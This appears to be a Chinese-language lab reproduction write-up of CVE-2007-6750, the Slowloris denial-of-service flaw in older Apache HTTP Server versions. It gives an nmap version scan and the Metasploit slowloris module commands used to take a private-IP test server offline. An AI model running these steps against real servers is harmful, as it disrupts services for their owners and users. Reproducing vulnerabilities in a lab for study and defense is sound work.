(CVE-2007-6750)Apache ddos
一、漏洞简介
Apache HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),如Slowloris所示,这与2.2.15之前版本中缺少mod_ReqTimeout模块有关
二、漏洞影响
Apache 1.x/2.x
三、复现过程
nmap -sV -p80 192.168.146.175(用nmap查看Apache版本)(Apache2.2.3初步断定存在漏洞)
data:image/s3,"s3://crabby-images/add44/add44dc08c4e4c899764a99dc3fec618b28e8c45" alt="image"
接着访问网站查看是否正常(发现网站正常)
data:image/s3,"s3://crabby-images/ef1d3/ef1d3cdad8974e4bab0881b3b1dea7d6a8b4d422" alt="image"
msfconsole(启动metasploit)
use auxiliary/dos/http/slowloris(使用模块)
set RHOST 192.168.146.175(设置目标IP)
run(执行攻击)
data:image/s3,"s3://crabby-images/09420/09420e701486502e6ec46ef3e7c41df1518760bd" alt="image"
再访问网站查看是否正常(发现网站瘫痪)
data:image/s3,"s3://crabby-images/17e3b/17e3b26f3362efffff8b44c75437f6f5ef17ec1a" alt="image"